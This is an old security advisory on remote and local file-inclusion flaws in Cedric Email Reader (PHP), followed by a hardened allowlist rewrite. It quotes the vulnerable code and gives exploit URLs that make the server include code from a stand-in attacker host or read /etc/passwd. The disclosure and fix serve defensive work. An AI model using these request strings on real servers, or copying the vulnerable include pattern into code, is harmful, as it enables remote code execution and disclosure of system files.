SECURITYVULNS:DOC:4070
Feb 11, 2003

Cedric Email Reader (PHP)


Versions: 0.2; 0.3; 0.4
Website: http://www.isoca.com/
Problems: Include file (local, remote)

Version: 0.2;0.3

File:

email.php3 (version 0.2) ; email.php (version 0.3)

PHP Code:

[…]
require('emailreader.ini');
if ($login > "") {
parse_str($param);
include($cer_skin);
include('email.inc');
$mbox = openimap($server, $username, $password);
$text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[…]

Exploit:

http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php
-->
include http://[attacker]/code.php on remote server

include local file
-->
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd

Versions: 0.4

File:

webmail/lib/emailreader_execute_on_each_page.inc.php

PHP Code:

[…]
$param = imap_base64($login);
parse_str($param);

@include($emailreader_ini);
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[…]

Exploit:

http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php
-->
include http://[attacker]/code.php on remote server

include local file
-->
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=/etc/passwd


(if register_globals=On)
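
A hardened form of the skin include from email.php, as an added example that is not code from this advisory or from Cedric Email Reader: the request value is used only as a key into a fixed allowlist and never as a path. The names load_params(), resolve_skin() and the skin file names are hypothetical.

```php
<?php
// Added example, not Cedric Email Reader code. Hypothetical names:
// load_params(), resolve_skin(), skin/default.php, skin/classic.php.

// Allowlist: the request supplies a key; the included path is a constant.
const SKINS = [
    'default' => __DIR__ . '/skin/default.php',
    'classic' => __DIR__ . '/skin/classic.php',
];

// parse_str() with a second argument fills an array instead of creating
// variables in the current scope, so $param cannot overwrite $cer_skin,
// $emailreader_ini or any other local variable.
function load_params(string $param): array
{
    $out = [];
    parse_str($param, $out);
    return $out;
}

function resolve_skin(array $params): string
{
    $key = $params['cer_skin'] ?? 'default';
    // Reject non-strings (cer_skin[]=x) and anything not in the allowlist:
    // URLs, absolute paths and ../ sequences all fall back to the default.
    if (!is_string($key) || !array_key_exists($key, SKINS)) {
        return SKINS['default'];
    }
    return SKINS[$key];
}

// Constructed sample inputs mirroring the request shapes in the advisory.
$samples = [
    'cer_skin=classic',
    'cer_skin=http://[attacker]/code.php',
    'cer_skin=/etc/passwd',
];
foreach ($samples as $param) {
    $path = resolve_skin(load_params($param));
    printf("%-40s -> %s\n", $param, basename($path));
    // A real page would now call: include $path;
}
```

The same approach applies to $emailreader_ini, $server_type and $lang in version 0.4: fixed paths or allowlisted keys, never request-supplied strings. Current PHP no longer has register_globals (removed in 5.4), and parse_str() requires the result-array argument as of 8.0.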

